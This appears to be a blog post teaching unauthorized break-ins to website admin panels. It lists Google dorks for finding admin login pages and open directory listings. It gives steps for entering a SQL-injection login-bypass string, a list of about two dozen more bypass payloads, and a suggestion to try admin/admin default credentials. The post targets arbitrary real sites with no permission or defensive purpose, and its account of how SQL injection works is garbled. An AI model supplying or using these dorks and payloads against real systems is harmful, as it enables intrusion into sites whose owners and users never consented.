We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Dorks:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
LET'S START !
Step 1: Go to Google, typ in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.
Step 3: Go to the website admin login page, type in:
username: 1'or'1'='1
password: 1'or'1'='1
NOW .. IT'S DONE ! .. WE ARE NOW LOG AS ADMINISTRATOR !
Other InjecTion Queries Code:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
================================================
================================================
some other google dorks i am going to provide you which i personally use.
intitle:"Index of /admin/css/" site:.com
intitle:"index of /gallery" site:.com
intitle:"index of /admin/photos" site:.com
intitle:"index of /images" site:.com
intitle:"index of /css" site:.com
intitle:"index of /js" site:.com
intitle:"index of admin/css" site:.com
intitle:"index of admin/js" site:.com
intitle:"index of admin/gallery" site:.com
intitle:"index of admin/uploads" site:.com
now go to admin area and put
user: admin
pass: admin
NOW .. IT'S DONE ! .. WE ARE NOW LOG AS ADMINISTRATOR !
- See more at: http://www.cyberadda.com/2014/08/sqli-hack-admin-account-website.html#sthash.Txsgk2Ez.dpuf
” or “x”=”x
No comments:
Post a Comment